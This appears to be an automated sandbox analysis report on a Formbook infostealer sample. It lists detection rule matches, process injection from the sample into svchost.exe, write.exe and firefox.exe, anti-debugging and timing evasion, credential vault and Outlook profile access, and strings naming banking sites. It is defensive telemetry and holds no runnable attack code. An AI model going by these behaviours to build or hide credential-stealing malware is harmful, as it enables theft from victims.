            Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/10
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeFile created: C:\Users\user\AppData\Local\Temp\nonagglutinantJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCommand line argument: ou0_2_0040D6B0
            Source: Z6s208B9QX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 0000000B.00000003.1916764326.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1914779751.0000000002BA2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002BA2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1914630931.0000000002B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Z6s208B9QX.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeFile read: C:\Users\user\Desktop\Z6s208B9QX.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Z6s208B9QX.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Z6s208B9QX.exeStatic file information: File size 1403415 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UCAmCgWJyh.exe, 0000000A.00000000.1650413823.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp, UCAmCgWJyh.exe, 0000000D.00000000.1799667591.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: Z6s208B9QX.exeStatic PE information: real checksum: 0xa961f should be: 0x15762c
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041385D push edx; retf 8_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040D829 push esp; ret 8_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004138D8 push edx; retf 8_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004138E3 push edx; retf 8_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00414913 push ds; ret 8_2_00414914
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040D238 pushad ; iretd 8_2_0040D23A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00403300 push eax; ret 8_2_00403302
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040D4E3 push edx; retf 8_2_0040D4EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040D77F push esp; ret 8_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037309AD push ecx; mov dword ptr [esp], ecx8_2_037309B6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047127FA pushad ; ret 11_2_047127F9
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0471225F pushad ; ret 11_2_047127F9
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0471283D push eax; iretd 11_2_04712858
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047409AD push ecx; mov dword ptr [esp], ecx11_2_047409B6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005420D1 push ecx; iretd 11_2_005420DA
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005420FC push FFFFFF8Fh; iretd 11_2_00542108
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00542255 push ebx; iretd 11_2_00542256
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0054055A push edx; retf 11_2_005405EC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005405D5 push edx; retf 11_2_005405EC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005405E0 push edx; retf 11_2_005405EC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00541610 push ds; ret 11_2_00541611
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00549B45 pushad ; ret 11_2_00549B47
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0054DB30 push eax; retf 59D6h11_2_0054DD16
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456C678 pushad ; retf 11_2_0456C7CD
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456C678 push 0000001Ch; iretd 11_2_0456C810
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456C7D7 push 0000001Ch; iretd 11_2_0456C810
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456C7B7 pushad ; retf 11_2_0456C7CD
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_045651DF push ds; ret 11_2_045651E3
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04560C1A push ds; ret 11_2_04560C1C
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04566DB9 push cs; iretd 11_2_04566DC0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeAPI/Special instruction interceptor: Address: 454F27C
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377096E rdtsc 8_2_0377096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9745Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87595
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\write.exe TID: 5228Thread sleep count: 228 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 5228Thread sleep time: -456000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 5228Thread sleep count: 9745 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 5228Thread sleep time: -19490000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe TID: 1556Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0054C340 FindFirstFileW,FindNextFileW,FindClose,11_2_0054C340
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 7251G3-6.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: 7251G3-6.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 7251G3-6.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 7251G3-6.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: 7251G3-6.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 7251G3-6.11.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 7251G3-6.11.drBinary or memory string: global block list test formVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 7251G3-6.11.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 7251G3-6.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: UCAmCgWJyh.exe, 0000000D.00000002.3744553832.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: 7251G3-6.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: firefox.exe, 00000011.00000002.2024960803.000001813FE6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7251G3-6.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 7251G3-6.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 7251G3-6.11.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: 7251G3-6.11.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: 7251G3-6.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 7251G3-6.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 7251G3-6.11.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: 7251G3-6.11.drBinary or memory string: discord.comVMware20,11696503903f
            Source: 7251G3-6.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeAPI call chain: ExitProcess graph end nodegraph_0-86725
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377096E rdtsc 8_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417593 LdrLoadDll,8_2_00417593
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0454F4E8 mov eax, dword ptr fs:[00000030h]0_2_0454F4E8
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0454F548 mov eax, dword ptr fs:[00000030h]0_2_0454F548
